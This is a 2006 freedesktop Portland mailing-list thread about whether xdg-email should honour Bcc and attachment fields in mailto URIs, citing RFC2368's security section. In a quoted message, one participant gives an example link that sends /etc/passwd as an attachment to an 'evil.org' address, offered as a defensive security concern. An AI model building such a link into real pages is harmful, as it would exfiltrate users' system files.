[Portland] RE: xdg-email BCC
Benjamin Meyer
bmeyer at trolltech.com
Tue Jun 6 02:53:22 PDT 2006
One problem with command line options that urls solve is that urls can be
unicode text that is encoded. With command line options you are stuck with
latin8bit. That is not a valid solution in the long term and a severe
limitation of the current command line arguments on applications like KMail.
-Benjamin Meyer
On Saturday 03 June 2006 00:23, Bastian, Waldo wrote:
> [CC'ing Portland list]
>
> Well RFC2368 was written with the web in mind. Our use case here is
> slightly different, we want to give applications the possibility to invoke
> a mailer. The points made in the RFC remain valid though, so maybe we
> should offer explicit options for BCC and Attachment but not honour these
> options when they are part of the URL. Maybe we should go even further and
> offer all other options as an explicit command line options as well, which
> might be convenient in case you have the individual elements at hand but
> not a URL. What do other people think?
>
> Waldo Bastian
> Linux Client Architect - Client Linux Foundation Technology
> Channel Platform Solutions Group
> Intel Corporation - http://www.intel.com/go/linux
> OSDL DTL Tech Board Chairman
> ________________________________________
> From: Whipple, Tom
> Sent: Friday, June 02, 2006 3:03 PM
> To: Bastian, Waldo
> Subject: xdg-email BCC
>
> >From the description in the xdg-email manpage:
>
> "mailto-uri may contain ... bcc, subject, body and attachment."
>
> However, from section 7 of RFC2368
>
> A mail client should never send anything without complete disclosure
> to the user of what is will be sent; it should disclose not only the
> message destination, but also any headers. Unrecognized headers, or
> headers with values inconsistent with those the mail client would
> normally send should be especially suspect. MIME headers (MIME-
> Version, Content-*) are most likely inappropriate, as are those
> relating to routing (From, Bcc, Apparently-To, etc.)
>
> Note that some headers are inherently unsafe to include in a message
> generated from a URL. For example, headers such as "From:", "Bcc:",
> and so on, should never be interpreted from a URL. In general, the
> fewer headers interpreted from the URL, the less likely it is that a
> sending agent will create an unsafe message.
>
> So, I don't think Bcc should be mentioned in the manpage. But, this is a
> "should not" so I don't think we need to test to see that this is NOT
> supported.
>
> Also, attachment is not mentioned in the RFC. I don't know if we want to
> think about it here and now, but what if I made a webpage with a link such
> as 'mailto:hacker at evil.org?attachment=/etc/passwd'. It seems that this
> would also be a security consideration.
>
> -tom
> _______________________________________________
> Portland mailing list
> Portland at lists.freedesktop.org
> http://lists.freedesktop.org/mailman/listinfo/portland
More information about the Portland
mailing list